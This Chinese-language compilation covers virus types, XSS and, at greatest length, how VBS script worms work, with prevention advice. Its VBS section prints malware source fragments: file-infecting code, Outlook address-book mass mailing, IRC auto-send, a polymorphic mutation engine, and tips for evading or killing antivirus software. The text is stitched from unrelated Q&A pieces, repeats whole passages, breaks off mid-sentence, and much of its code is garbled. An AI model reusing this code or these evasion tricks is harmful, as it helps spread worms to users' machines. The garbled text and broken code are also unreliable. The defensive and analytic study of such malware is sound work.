A. 計算機病毒的種類、工作原理、攻擊方式和防禦措施
1、系統病毒
系統病毒的前綴為:Win32、PE、Win95、W32、W95等。這些病毒的一般公有的特性是可以感染windows操作系統的 *.exe 和 *.dll 文件,並通過這些文件進行傳播。如CIH病毒。
2、蠕蟲病毒
蠕蟲病毒的前綴是:Worm。這種病毒的公有特性是通過網路或者系統漏洞進行傳播,很大部分的蠕蟲病毒都有向外發送帶毒郵件,阻塞網路的特性。比如沖擊波(阻塞網路),小郵差(發帶毒郵件) 等。
3、木馬病毒、黑客病毒
木馬病毒其前綴是:Trojan,黑客病毒前綴名一般為 Hack 。木馬病毒的公有特性是通過網路或者系統漏洞進入用戶的系統並隱藏,然後向外界泄露用戶的信息,而黑客病毒則有一個可視的界面,能對用戶的電腦進行遠程式控制制。木馬、黑客病毒往往是成對出現的,即木馬病毒負責侵入用戶的電腦,而黑客病毒則會通過該木馬病毒來進行控制。現在這兩種類型都越來越趨向於整合了。一般的木馬如QQ消息尾巴木馬 Trojan.QQ3344 ,還有大家可能遇見比較多的針對網路游戲的木馬病毒如 Trojan.LMir.PSW.60 。這里補充一點,病毒名中有PSW或者什麼PWD之類的一般都表示這個病毒有盜取密碼的功能(這些字母一般都為「密碼」的英文「password」的縮寫)一些黑客程序如:網路梟雄(Hack.Nether.Client)等。
4、腳本病毒
腳本病毒的前綴是:Script。腳本病毒的公有特性是使用腳本語言編寫,通過網頁進行的傳播的病毒,如紅色代碼(Script.Redlof)。腳本病毒還會有如下前綴:VBS、JS(表明是何種腳本編寫的),如歡樂時光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。
5、宏病毒
其實宏病毒是也是腳本病毒的一種,由於它的特殊性,因此在這里單獨算成一類。宏病毒的前綴是:Macro,第二前綴是:Word、Word97、Excel、Excel97(也許還有別的)其中之一。凡是只感染WORD97及以前版本WORD文檔的病毒採用Word97做為第二前綴,格式是:Macro.Word97;凡是只感染WORD97以後版本WORD文檔的病毒採用Word做為第二前綴,格式是:Macro.Word;凡是只感染EXCEL97及以前版本EXCEL文檔的病毒採用Excel97做為第二前綴,格式是:Macro.Excel97;凡是只感染EXCEL97以後版本EXCEL文檔的病毒採用Excel做為第二前綴,格式是:Macro.Excel,依此類推。該類病毒的公有特性是能感染OFFICE系列文檔,然後通過OFFICE通用模板進行傳播,如:著名的美麗莎(Macro.Melissa)。
6、後門病毒
後門病毒的前綴是:Backdoor。該類病毒的公有特性是通過網路傳播,給系統開後門,給用戶電腦帶來安全隱患。如54很多朋友遇到過的IRC後門Backdoor.IRCBot 。
7、病毒種植程序病毒
這類病毒的公有特性是運行時會從體內釋放出一個或幾個新的病毒到系統目錄下,由釋放出來的新病毒產生破壞。如:冰河播種者(Dropper.BingHe2.2C)、MSN射手(Dropper.Worm.Smibag)等。
8.破壞性程序病毒
破壞性程序病毒的前綴是:Harm。這類病毒的公有特性是本身具有好看的圖標來誘惑用戶點擊,當用戶點擊這類病毒時,病毒便會直接對用戶計算機產生破壞。如:格式化C盤(Harm.formatC.f)、殺手命令(Harm.Command.Killer)等。
9.玩笑病毒
玩笑病毒的前綴是:Joke。也稱惡作劇病毒。這類病毒的公有特性是本身具有好看的圖標來誘惑用戶點擊,當用戶點擊這類病毒時,病毒會做出各種破壞操作來嚇唬用戶,其實病毒並沒有對用戶電腦進行任何破壞。如:女鬼(Joke.Girlghost)病毒。
10.捆綁機病毒
捆綁機病毒的前綴是:Binder。這類病毒的公有特性是病毒作者會使用特定的捆綁程序將病毒與一些應用程序如QQ、IE捆綁起來,表面上看是一個正常的文件,當用戶運行這些捆綁病毒時,會表面上運行這些應用程序,然後隱藏運行捆綁在一起的病毒,從而給用戶造成危害。如:捆綁QQ(Binder.QQPass.QQBin)、系統殺手(Binder.killsys)等。以上為比較常見的病毒前綴,有時候還會看到一些其他的,但比較少見,這里簡單提一下:
DoS:會針對某台主機或者伺服器進行DoS攻擊;
Exploit:會自動通過溢出對方或者自己的系統漏洞來傳播自身,或者他本身就是一個用於Hacking的溢出工具;
HackTool:黑客工具,也許本身並不破壞你的機子,但是會被別人加以利用來用你做替身去破壞別人。
B. 誰能說一下腳本病毒的原理、攻擊流程與防護、、最好詳細點呀、網站也好、謝啦、、
通過對xss跨站腳本攻擊漏洞的歷史、攻擊特點、攻擊原理描述及案例代碼實戰舉例詳細解析XSS漏洞攻擊技術,並提出防禦XSS跨站漏洞的思路方法。及WEB開發者開發網站過程中防範編碼中產生xss跨站腳本攻擊漏洞需要注意的事項。
XSS漏洞概述:
XSS(Cross Site Script)跨站點腳本攻擊是一種注射的問題,在這種惡意腳本注入否則良性和信任的網站類型。跨站點腳本(XSS)攻擊,攻擊者使用時,會出現一個網路應用程序發送惡意代碼,一般是在瀏覽器端腳本的形式,向不同的最終用戶。這些缺陷,使攻擊成功是相當普遍,發生在任何地方從一個Web應用程序使用在輸出它沒有驗證或編碼了用戶輸入。攻擊者可以使用XSS的惡意腳本發送到一個毫無戒心的用戶。最終用戶的瀏覽有沒有辦法知道該腳本不應該信任,將執行該腳本。因為它認為該腳本來從一個受信任的源,惡意腳本可以訪問任何Cookie,會話令牌,或其他敏感信息的瀏覽器保留,並與該網站使用。 甚至可以重寫這些腳本的HTML網頁的內容。
XSS漏洞歷史:
XSS(Cross-site scripting)漏洞最早可以追溯到1996年,那時電子商務才剛剛起步,估計那時候國內很少人會想像到今天出現的幾個國內電子商務巨頭淘寶、當當、亞馬遜(卓越)。XSS的出現「得益」於JavaScript的出現,JavaScript的出現給網頁的設計帶來了無限驚喜,包括今天風行的AJAX(Asynschronous JavaScript and XML)。同時,這些元素又無限的擴充了今天的網路安全領域。
XSS 漏洞攻擊特點:
(1)XSS跨站漏洞種類多樣人:
XSS攻擊語句可插入到、URL地址參數後面、輸入框內、img標簽及DIV標簽等HTML函數的屬人里、Flash的getURL()動作等地方都會觸發XSS漏洞。
(2)XSS跨站漏洞代碼多樣人:
為了躲避轉義HTML特殊字元函數及過濾函數的過濾,XSS跨站的代碼使用「/」來代替安字元「」」、使用Tab鍵代替空格、部分語句轉找成16進制、添加特殊字元、改變大小寫及使用空格等來繞過過濾函數。
如果在您的新聞系統發現安全漏洞,如果該漏洞是一個SQL 注入漏洞,那麼該漏洞就會得到您的網站管理員密碼、可以在主機系統上執行shell命令、對資料庫添加、刪除數據。如果在您的新聞或郵件系統中發現安全漏洞,如果該漏洞是一個XSS跨站漏洞,那麼可以構造一些特殊代碼,只要你訪問的頁麵包含了構造的特殊代碼,您的主機可能就會執行木馬程序、執行^***Cookies代碼、突然轉到一個銀行及其它金融類的網站、泄露您的網銀及其它賬號與密碼等。
XSS攻擊原理:
XSS 屬於被動式的攻擊。攻擊者先構造一個跨站頁面,利用script、<IMG>、<IFRAME>等各種方式使得用戶瀏覽這個頁面時,觸發對被攻擊站點的http 請求。此時,如果被攻擊者如果已經在被攻擊站點登錄,就會持有該站點cookie。這樣該站點會認為被攻擊者發起了一個http 請求。而實際上這個請求是在被攻擊者不知情的情況下發起的,由此攻擊者在一定程度上達到了冒充被攻擊者的目的。精心的構造這個攻擊請求,可以達到冒充發文,奪取許可權等等多個攻擊目的。在常見的攻擊實例中,這個請求是通過script 來發起的,因此被稱為Cross Site Script。攻擊Yahoo Mail 的Yamanner 蠕蟲是一個著名的XSS 攻擊實例。Yahoo Mail 系統有一個漏洞,當用戶在web 上察看信件時,有可能執行到信件內的javascript 代碼。病毒可以利用這個漏洞使被攻擊用戶運行病毒的script。同時Yahoo Mail 系統使用了Ajax技術,這樣病毒的script 可以很容易的向Yahoo Mail 系統發起ajax 請求,從而得到用戶的地址簿,並發送病毒給他人。
XSS 攻擊主要分為兩類:一類是來自內部的攻擊,主要指的是利用WEB 程序自身的漏洞,提交特殊的字元串,從而使得跨站頁面直接存在於被攻擊站點上,這個字元串被稱為跨站語句。這一類攻擊所利用的漏洞非常類似於SQL Injection 漏洞,都是WEB程序沒有對用戶輸入作充分的檢查和過濾。上文的Yamanner 就是一例。
另一類則是來來自外部的攻擊,主要指的自己構造XSS 跨站漏洞網頁或者尋找非目標機以外的有跨站漏洞的網頁。如當我們要滲透一個站點,我們自己構造一個跨站網頁放在自己的伺服器上,然後通過結合其它技術,如社會工程學等,欺騙目標伺服器的管理員打開。這一類攻擊的威脅相對較低,至少ajax 要發起跨站調用是非常困難的。
C. 如何預防腳本病毒
1)禁用文件系統對象FileSystemObject
方法:用regsvr32 scrrun.dll /u這條命令就可以禁止文件系統對象。其中regsvr32是Windows\System下的可執行文件。或者直接查找scrrun.dll文件刪除或者改名。
還有一種方法就是在注冊表中HKEY_CLASSES_ROOT\CLSID\下找到一個主鍵{0D43FE01-F093-11CF-8940-00A0C9054228}的項,咔嚓即可。
2)卸載Windows Scripting Host
在Windows 98中(NT 4.0以上同理),打開[控制面板]→[添加/刪除程序]→[Windows安裝程序]→[附件],取消「Windows Scripting Host」一項。
和上面的方法一樣,在注冊表中HKEY_CLASSES_ROOT\CLSID\下找到一個主鍵{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}的項,咔嚓。
3)刪除VBS、VBE、JS、JSE文件後綴名與應用程序的映射
點擊[我的電腦]→[查看]→[文件夾選項]→[文件類型],然後刪除VBS、VBE、JS、JSE文件後綴名與應用程序的映射。
4)在Windows目錄中,找到WScript.exe,更改名稱或者刪除,如果你覺得以後有機會用到的話,最好更改名稱好了,當然以後也可以重新裝上。
5)要徹底防治VBS網路蠕蟲病毒,還需設置一下你的瀏覽器。我們首先打開瀏覽器,單擊菜單欄里「Internet 選項」安全選項卡里的[自定義級別]按鈕。把「ActiveX控制項及插件」的一切設為禁用,這樣就不怕了。呵呵,譬如新歡樂時光的那個ActiveX組件如果不能運行,網路傳播這項功能就玩完了。
6)禁止OE的自動收發郵件功能
7)由於蠕蟲病毒大多利用文件擴展名作文章,所以要防範它就不要隱藏系統中已知文件類型的擴展名。Windows默認的是「隱藏已知文件類型的擴展名稱」,將其修改為顯示所有文件類型的擴展名稱。
8)將系統的網路連接的安全級別設置至少為「中等」,它可以在一定程度上預防某些有害的Java程序或者某些ActiveX組件對計算機的侵害。
9)呵呵,最後一項不說大家也應該知道了,殺毒軟體確實很必要,盡管有些殺毒軟體挺讓廣大用戶失望,不過,選擇是雙方的哦。在這個病毒橫飛的網路,如果您的機器沒有裝上殺毒軟體我覺得確實挺不可思議的。
四、對所有腳本類病毒發展的展望
隨著網路的飛速發展,網路蠕蟲病毒開始流行,而VBS腳本蠕蟲則更加突出,不僅數量多,而且威力大。由於利用腳本編寫病毒比較簡單,除了將繼續流行目前的VBS腳本病毒外,將會逐漸出現更多的其它腳本類病毒,譬如PHP,JS,Perl病毒等。但是腳本並不是真正病毒技術愛好者編寫病毒的最佳工具,並且腳本病毒解除起來比較容易、相對容易防範。筆者認為,腳本病毒仍將繼續流行,但是能夠具有像宏病毒、新歡樂時光那樣大影響的腳本蠕蟲病毒只是少
D. 什麼是腳本病毒
什麼是惡意腳本?
惡意腳本是指一切以製造危害或者損害系統功能為目的而從軟體系統中增加、改變或刪除的任何腳本。傳統的惡意腳本包括:病毒,蠕蟲,特洛伊木馬,和攻擊性腳本。更新的例子包括: Java攻擊小程序(Java attack applets)和危險的ActiveX控制項。
防治惡意腳本,應該採取以下措施 :
第一,上網時開啟瑞星殺毒軟體的八大監控。
第二,不要輕易瀏覽不良網站。
第三,如果懷疑自己感染了惡意腳本,可以登陸瑞星免費查毒網站,對自己的電腦進行全面掃描。
具體的原理和防範方法到這里去學習下:
http://www.yesky.com/SoftChannel/72356699872165888/20031015/1736105.shtml
E. VBS腳本病毒的病毒原理分析
1.vbs腳本病毒如何感染、搜索文件
VBS腳本病毒一般是直接通過自我復制來感染文件的,病毒中的絕大部分代碼都可以直接附加在其他同類程序的中間,譬如新歡樂時光病毒可以將自己的代碼附加在.htm文件的尾部,並在頂部加入一條調用病毒代碼的語句,而宏病毒則是直接生成一個文件的副本,將病毒代碼拷入其中,並以原文件名作為病毒文件名的前綴,vbs作為後綴。下面我們通過宏病毒的部分代碼具體分析一下這類病毒的感染和搜索原理:
以下是文件感染的部分關鍵代碼:
Set fso=createobject(scripting.filesystemobject)
'創建一個文件系統對象
set self=fso.opentextfile(wscript.scriptfullname,1)
'讀打開當前文件(即病毒本身)
vbs=self.readall
' 讀取病毒全部代碼到字元串變數vbs……
set ap=fso.opentextfile(目標文件.path,2,true)
' 寫打開目標文件,准備寫入病毒代碼
ap.write vbs ' 將病毒代碼覆蓋目標文件
ap.close
set cop=fso.getfile(目標文件.path) '得到目標文件路徑
cop.(目標文件.path & .vbs)
' 創建另外一個病毒文件(以.vbs為後綴)
目標文件.delete(true)
'刪除目標文件
上面描述了病毒文件是如何感染正常文件的:首先將病毒自身代碼賦給字元串變數vbs,然後將這個字元串覆蓋寫到目標文件,並創建一個以目標文件名為文件名前綴、vbs為後綴的文件副本,最後刪除目標文件。
下面我們具體分析一下文件搜索代碼:
'該函數主要用來尋找滿足條件的文件,並生成對應文件的一個病毒副本
sub scan(folder_) 'scan函數定義,
on error resume next '如果出現錯誤,直接跳過,防止彈出錯誤窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files ' 當前目錄的所有文件集合
for each file in filesext=fso.GetExtensionName(file)
'獲取文件後綴
ext=lcase(ext) '後綴名轉換成小寫字母
if ext=mp5 then '如果後綴名是mp5,則進行感染。
請自己建立相應後綴名的文件,最好是非正常後綴名 ,以免破壞正常程序。
Wscript.echo (file)
end ifnextset subfolders=folder_.subfoldersfor each subfolder in subfolders '搜索其他目錄;遞歸調用
scan( ) scan(subfolder)
next
end sub
上面的代碼就是VBS腳本病毒進行文件搜索的代碼分析。搜索部分scan( )函數做得比較短小精悍,非常巧妙,採用了一個遞歸的演算法遍歷整個分區的目錄和文件。
2.vbs腳本病毒通過網路傳播的幾種方式及代碼分析
VBS腳本病毒之所以傳播范圍廣,主要依賴於它的網路傳播功能,一般來說,VBS腳本病毒採用如下幾種方式進行傳播:
1)通過Email附件傳播
這是一種用的非常普遍的傳播方式,病毒可以通過各種方法拿到合法的Email地址,最常見的就是直接取outlook地址簿中的郵件地址,也可以通過程序在用戶文檔(譬如htm文件)中搜索Email地址。
下面我們具體分析一下VBS腳本病毒是如何做到這一點的:
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject(Outlook.Application)
//創建一個OUTLOOK應用的對象
If outlookApp= Outlook Then
Set mapiObj=outlookApp.GetNameSpace(MAPI)
//獲取MAPI的名字空間
Set addrList= mapiObj.AddressLists
//獲取地址表的個數
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count
//獲取每個地址表的Email記錄數
For addrEntIndex= 1 To addrEntCount
//遍歷地址表的Email地址
Set item = outlookApp.CreateItem(0)
//獲取一個郵件對象實例
Set addrEnt = addr.AddressEntries(addrEntIndex)
//獲取具體Email地址
= addrEnt.Address
//填入收信人地址
item.Subject = 病毒傳播實驗
//寫入郵件標題
item.Body = 這里是病毒郵件傳播測試,收到此信請不要慌張!
//寫入文件內容
Set attachMents=item.Attachments //定義郵件附件
attachMents.Add fileSysObj.GetSpecialFolder(0)& est.jpg.vbs
item.DeleteAfterSubmit = True
//信件提交後自動刪除
Then
item.Send
//發送郵件
shellObj.regwrite HKCUsoftwareMailtestmailed, 1
//病毒標記,以免重復感染
End If
NextEnd IfNext
End if
End Function
2)通過區域網共享傳播
區域網共享傳播也是一種非常普遍並且有效的網路傳播方式。一般來說,為了區域網內交流方便,一定存在不少共享目錄,並且具有可寫許可權,譬如win2000創建共享時,默認就是具有可寫許可權。這樣病毒通過搜索這些共享目錄,就可以將病毒代碼傳播到這些目錄之中。
在VBS中,有一個對象可以實現網上鄰居共享文件夾的搜索與文件操作。我們利用該對象就可以達到傳播的目的。
welcome_msg = 網路連接搜索測試
Set WSHNetwork = WScript.CreateObject(WScript.Network)
』創建一個網路對象
Set oPrinters = WshNetwork.EnumPrinterConnections
』創建一個網路列印機連接列表
WScript.Echo Network printer mappings:
For i = 0 to oPrinters.Count - 1Step2
』顯示網路列印機連接情況
WScript.Echo Port &oPrinters.Item(i)
& = & oPrinters.Item(i+1)
Next
Set colDrives = WSHNetwork.EnumNetworkDrives
』創建一個網路共享連接列表
If colDrives.Count = 0 Then
MsgBox 沒有可列出的驅動器。,
vbInformation + vbOkOnly,welcome_msg
Else
strMsg = 當前網路驅動器連接: &CRLF
Fori=0To colDrives.Count - 1 Step 2
strMsg = strMsg & Chr(13)&Chr(10)&colDrives(i)
& Chr(9)&colDrives(i+1)
Next
MsgBox strMsg, vbInformation + vbOkOnly,
welcome_msg』顯示當前網路驅動器連接
End If
上面是一個用來尋找當前列印機連接和網路共享連接並將它們顯示出來的完整腳本程序。在知道了共享連接之後,我們就可以直接向目標驅動器讀寫文件了。
3)通過感染htm、asp、jsp、php等網頁文件傳播
如今,WWW服務已經變得非常普遍,病毒通過感染htm等文件,勢必會導致所有訪問過該網頁的用戶機器感染病毒。
病毒之所以能夠在htm文件中發揮強大功能,採用了和絕大部分網頁惡意代碼相同的原理。基本上,它們採用了相同的代碼,不過也可以採用其它代碼,這段代碼是病毒FSO,WSH等對象能夠在網頁中運行的關鍵。在注冊表HKEY_CLASSES_ROOTCLSID下我們可以找到這么一個主鍵,注冊表中對它他的說明是「Windows Script Host Shell Object」,同樣,我們也可以找到,注冊表對它的說明是「FileSystem Object」,一般先要對COM進行初始化,在獲取相應的組件對象之後,病毒便可正確地使用FSO、WSH兩個對象,調用它們的強大功能。代碼如下所示:
Set Apple0bject = document.applets(KJ_guest)Apple0bject.setCLSID()Apple0bject.createInstance() 』創建一個實例
Set WsShell Apple0bject.Get0bject()
Apple0bject.setCLSID()
Apple0bject.createInstance()
』創建一個實例
Set FSO = Apple0bject.Get0bject()
對於其他類型文件,這里不再一一分析。
4)通過IRC聊天通道傳播
病毒通過IRC傳播一般來說採用以下代碼(以MIRC為例)
Dim mirc
set fso=CreateObject(Scripting.FileSystemObject)
set mirc=fso.CreateTextFile(C:mircscript.ini)
』創建文件script.ini
fso.CopyFile Wscript.ScriptFullName, C:mircattachment.vbs,
True 』將病毒文件備份到attachment.vbs
mirc.WriteLine [script]
mirc.WriteLine n0=on 1:join:*.*:
{if($nick !=$me) /dcc send $nick C:mircattachment.vbs }
'利用命令/ddc send $nick attachment.vbs給通道中的其他用戶傳送病毒文件
mirc.Close
以上代碼用來往Script.ini文件中寫入一行代碼,實際中還會寫入很多其他代碼。Script.ini中存放著用來控制IRC會話的命令,這個文件裡面的命令是可以自動執行的。譬如,TUNE.VBS病毒就會修改c:mircscript.ini 和 c:mircmirc.ini,使每當IRC用戶使用被感染的通道時都會收到一份經由DDC發送的TUNE.VBS。同樣,如果Pirch98已安裝在目標計算機的c:pirch98目錄下,病毒就會修改c:pirch98events.ini和c:pirch98pirch98.ini,使每當IRC用戶使用被感染的通道時都會收到一份經由DDC發送的TUNE.VBS。
另外病毒也可以通過現在廣泛流行的KaZaA進行傳播。病毒將病毒文件拷貝到KaZaA的默認共享目錄中,這樣,當其他用戶訪問這台機器時,就有可能下載該病毒文件並執行。這種傳播方法可能會隨著KaZaA這種點對點共享工具的流行而發生作用。
還有一些其他的傳播方法,我們這里不再一一列舉。
3.VBS腳本病毒如何獲得控制權
如何獲取控制權?這一個是一個比較有趣的話題,而VBS腳本病毒似乎將這個話題發揮的淋漓盡致。筆者在這里列出幾種典型的方法:
1)修改注冊表項
windows在啟動的時候,會自動載入HKEY_LOCAL_項下的各鍵值所執向的程序。腳本病毒可以在此項下加入一個鍵值指向病毒程序,這樣就可以保證每次機器啟動的時候拿到控制權。vbs修改注冊表的方法比較簡單,直接調用下面語句即可。 wsh.RegWrite(strName, anyvalue [,strType])
2)通過映射文件執行方式
譬如,我們新歡樂時光將dll的執行方式修改為wscript.exe。甚至可以將exe文件的映射指向病毒代碼。
3)欺騙用戶,讓用戶自己執行
這種方式其實和用戶的心理有關。譬如,病毒在發送附件時,採用雙後綴的文件名,由於默認情況下,後綴並不顯示,舉個例子,文件名為beauty.jpg.vbs的vbs程序顯示為beauty.jpg,這時用戶往往會把它當成一張圖片去點擊。同樣,對於用戶自己磁碟中的文件,病毒在感染它們的時候,將原有文件的文件名作為前綴,vbs作為後綴產生一個病毒文件,並刪除原來文件,這樣,用戶就有可能將這個vbs文件看作自己原來的文件運行。
4)desktop.ini和folder.htt互相配合
這兩個文件可以用來配置活動桌面,也可以用來自定義文件夾。如果用戶的目錄中含有這兩個文件,當用戶進入該目錄時,就會觸發folder.htt中的病毒代碼。這是新歡樂時光病毒採用的一種比較有效的獲取控制權的方法。並且利用folder.htt,還可能觸發exe文件,這也可能成為病毒得到控制權的一種有效方法!
病毒獲得控制權的方法還有很多,這方面作者發揮的餘地也比較大。
4.vbs腳本病毒對抗反病毒軟體的幾種技巧
病毒要生存,對抗反病毒軟體的能力也是必需的。一般來說,VBS腳本病毒採用如下幾種對抗反病毒軟體的方法:
1)自加密
譬如,新歡樂時光病毒,它可以隨機選取密鑰對自己的部分代碼進行加密變換,使得每次感染的病毒代碼都不一樣,達到了多態的效果。這給傳統的特徵值查毒法帶來了一些困難。病毒也還可以進一步的採用變形技術,使得每次感染後的加密病毒的解密後的代碼都不一樣。
下面看一個簡單的vbs腳本變形引擎(來自flyshadow)
Randomize
Set Of = CreateObject(Scripting.FileSystemObject)
』創建文件系統對象
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall
』讀取自身代碼
fS=Array(Of, vC, fS, fSC)
』定義一個即將被替換字元的數組
For fSC = 0 To 3
vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65))
& Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65))
& Chr((Int(Rnd * 22) + 65)))
』取4個隨機字元替換數組fS中的字元串
Next
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC 』將替換後的代碼寫迴文件
上面這段代碼使得該VBS文件在每次運行後,其Of,vC,fS,fSC四字元串都會用隨機字元串來代替,這在很大程度上可以防止反病毒軟體用特徵值查毒法將其查出。
2)巧妙運用Execute函數
用過VBS程序的朋友是否會覺得奇怪:當一個正常程序中用到了FileSystemObject對象的時候,有些反病毒軟體會在對這個程序進行掃描的時候報告說此Vbs文件的風險為高,但是有些VBS腳本病毒同樣採用了FileSystemObject對象,為什麼卻又沒有任何警告呢?原因很簡單,就是因為這些病毒巧妙的運用了Execute方法。有些殺毒軟體檢測VBS病毒時,會檢查程序中是否聲明使用了FileSystemObject對象,如果採用了,這會發出報警。如果病毒將這段聲明代碼轉化為字元串,然後通過Execute(String)函數執行,就可以躲避某些反病毒軟體。
3)改變某些對象的聲明方法
譬如fso=createobject(scripting.filesystemobject),我們將其改變為
fso=createobject(script+ing.filesyste+mobject),這樣反病毒軟體對其進行靜態掃描時就不會發現filesystemobject對象。
4)直接關閉反病毒軟體
VBS腳本功能強大,它可以直接在搜索用戶進程然後對進程名進行比較,如果發現是反病毒軟體的進程就直接關閉,並對它的某些關鍵程序進行刪除。
5.Vbs病毒生產機的原理介紹
所謂病毒生產機就是指可以直接根據用戶的選擇產生病毒源代碼的軟體。在很多人看來這或許不可思議,其實對腳本病毒而言它的實現非常簡單。
腳本語言是解釋執行的、不需要編譯,程序中不需要什麼校驗和定位,每條語句之間分隔得比較清楚。這樣,先將病毒功能做成很多單獨的模塊,在用戶做出病毒功能選擇後,生產機只需要將相應的功能模塊拼湊起來,最後再作相應的代碼替換和優化即可。由於篇幅關系和其他原因,這里不作詳細介紹。
三、如何防範vbs腳本病毒
1.如何從樣本中提取(加密)腳本病毒
對於沒有加密的腳本病毒,我們可以直接從病毒樣本中找出來,現在介紹一下如何從病毒樣本中提取加密VBS腳本病毒,這里我們以新歡樂時光為例。
用JediEdit打開folder.htt。我們發現這個文件總共才93行,第一行,幾行注釋後,以開始,節尾。相信每個人都知道這是個什麼類型的文件吧!
第87行到91行,是如下語句:
87:
第87和91行不用解釋了,第88行是一個字元串的賦值,很明顯這是被加密過的病毒代碼。看看89行最後的一段代碼ThisText = ThisText & TempChar,再加上下面那一行,我們肯定能夠猜到ThisText裡面放的是病毒解密代碼(熟悉vbs的兄弟當然也可以分析一下這段解密代碼,too simple!就算完全不看代碼也應該可以看得出來的)。第90行是執行剛才ThisText中的那段代碼(經過解密處理後的代碼)。
那麼,下一步該怎麼做呢?很簡單,我們只要在病毒代碼解密之後,將ThisText的內容輸出到一個文本文件就可以解決了。由於上面幾行是vbscript,於是我創建了如下一個.txt文件:
首先,第88、89兩行到剛才建立的.txt文件,當然如果你願意看看新歡樂時光的執行效果,你也可以在最後輸入第90行。然後在下面一行輸入創建文件和將ThisText寫入文件vbs代碼,整個文件如下所示:
ExeString = Afi...』 第88行代碼
Execute(Dim KeyAr... 』 第89行代碼
set fso=createobject(scripting.filesystemobject)
』 創建一個文件系統對象
set virusfile=fso.createtextfile(resource.log,true)
』 創建一個新文件resource.log,
用以存放解密後的病毒代碼 virusfile.writeline(ThisText)
』 將解密後的代碼寫入resource.log
OK!就這么簡單,保存文件,將該文件後綴名.txt改為.vbs(.vbe也可以),雙擊,你會發現該文件目錄下多了一個文件resource.log,打開這個文件,怎麼樣?是不是「新歡樂時光」的源代碼啊!
2.vbs腳本病毒的弱點
vbs腳本病毒由於其編寫語言為腳本,因而它不會像PE文件那樣方便靈活,它的運行是需要條件的(不過這種條件默認情況下就具備了)。筆者認為,VBS腳本病毒具有如下弱點:
1)絕大部分VBS腳本病毒運行的時候需要用到一個對象:FileSystemObject
2)VBScript代碼是通過Windows Script Host來解釋執行的。
3)VBS腳本病毒的運行需要其關聯程序Wscript.exe的支持。
4)通過網頁傳播的病毒需要ActiveX的支持
5)通過Email傳播的病毒需要OE的自動發送郵件功能支持,但是絕大部分病毒都是以Email為主要傳播方式的。
3.如何預防和解除vbs腳本病毒
針對以上提到的VBS腳本病毒的弱點,筆者提出如下集中防範措施:
1)禁用文件系統對象FileSystemObject
方法:用regsvr32 scrrun.dll /u這條命令就可以禁止文件系統對象。其中regsvr32是WindowsSystem下的可執行文件。或者直接查找scrrun.dll文件刪除或者改名。
還有一種方法就是在注冊表中HKEY_CLASSES_ROOTCLSID下找到一個主鍵的項,咔嚓即可。
2)卸載Windows Scripting Host
在Windows 98中(NT 4.0以上同理),打開[控制面板]→[添加/刪除程序]→[Windows安裝程序]→[附件],取消「Windows Scripting Host」一項。
和上面的方法一樣,在注冊表中HKEY_CLASSES_ROOTCLSID下找到一個主鍵的項,咔嚓。
3)刪除VBS、VBE、JS、JSE文件後綴名與應用程序的映射
點擊[我的電腦]→[查看]→[文件夾選項]→[文件類型],然後刪除VBS、VBE、JS、JSE文件後綴名與應用程序的映射。
4)在Windows目錄中,找到WScript.exe,更改名稱或者刪除,如果你覺得以後有機會用到的話,最好更改名稱好了,當然以後也可以重新裝上。
5)要徹底防治VBS網路蠕蟲病毒,還需設置一下你的瀏覽器。我們首先打開瀏覽器,單擊菜單欄里「Internet 選項」安全選項卡里的[自定義級別]按鈕。把「ActiveX控制項及插件」的一切設為禁用,這樣就不怕了。呵呵,譬如新歡樂時光的那個ActiveX組件如果不能運行,網路傳播這項功能就玩完了。
6)禁止OE的自動收發郵件功能
7)由於蠕蟲病毒大多利用文件擴展名作文章,所以要防範它就不要隱藏系統中已知文件類型的擴展名。Windows默認的是「隱藏已知文件類型的擴展名稱」,將其修改為顯示所有文件類型的擴展名稱。
8)將系統的網路連接的安全級別設置至少為「中等」,它可以在一定程度上預防某些有害的Java程序或者某些ActiveX組件對計算機的侵害。
9)呵呵,最後一項不說大家也應該知道了,殺毒軟體確實很必要,盡管有些殺毒軟體挺讓廣大用戶失望,不過,選擇是雙方的哦。在這個病毒橫飛的網路,如果您的機器沒有裝上殺毒軟體我覺得確實挺不可思議的。
四、對所有腳本類病毒發展的展望
隨著網路的飛速發展,網路蠕蟲病毒開始流行,而VBS腳本蠕蟲則更加突出,不僅數量多,而且威力大。由於利用腳本編寫病毒比較簡單,除了將繼續流行目前的VBS腳本病毒外,將會逐漸出現更多的其它腳本類病毒,譬如PHP,JS,Perl病毒等。但是腳本並不是真正病毒技術愛好者編寫病毒的最佳工具,並且腳本病毒解除起來比較容易、相對容易防範。筆者認為,腳本病毒仍將繼續流行,但是能夠具有像宏病毒、新歡樂時光那樣大影響的腳本蠕蟲病毒只是少數。
F. 關於病毒的知識
一、預防病毒措施
由於網路是一個互聯的整體,再加上病毒通過網路傳播的頻繁,因此網路時代的防毒個人客戶端、伺服器加強防毒意識同等重要。
個人防毒
1、慎用軟盤、光碟等移動存儲介質;
2、選用優秀反病毒軟體;
3、正確使用反病毒軟體:首先保持及時升級反病毒軟體;第二實時開啟反病毒軟體的監控功能;
4、不要輕易打開電子郵件中的附件,尤其是可執行文件、Office文檔文件;
5、謹慎下載控制項、腳本;
6、定製瀏覽器安全設置,將「自定義級別」設置為禁止(或提示)下載ActiveX、禁用(或提示啟動)Java腳本等安全設置;
7、養成對免費、共享軟體先查毒、後使用的好習慣;
8、蠕蟲病毒流行的年代,不要在線啟動、閱讀某些文件,杜絕成為網路病毒的傳播者;
伺服器防毒
1、經常備份系統;
2、為不同的用戶分配各自相應的許可權;
3、禁止在伺服器上運行應用程序;
4、杜絕安裝盜版軟體;
5、禁止軟盤啟動。
病毒分類
引導區病毒
這類病毒隱藏在硬碟或軟盤的引導區,當計算機從感染了引導區病毒的硬碟或軟盤啟動,或當計算機從受感染的軟盤中讀取數據時,引導區病毒就開始發作。一旦它們將自己拷貝到您的機器內存中,馬上就會感染其他磁碟的引導區,或通過網路傳播到其他計算機上。
文件型病毒
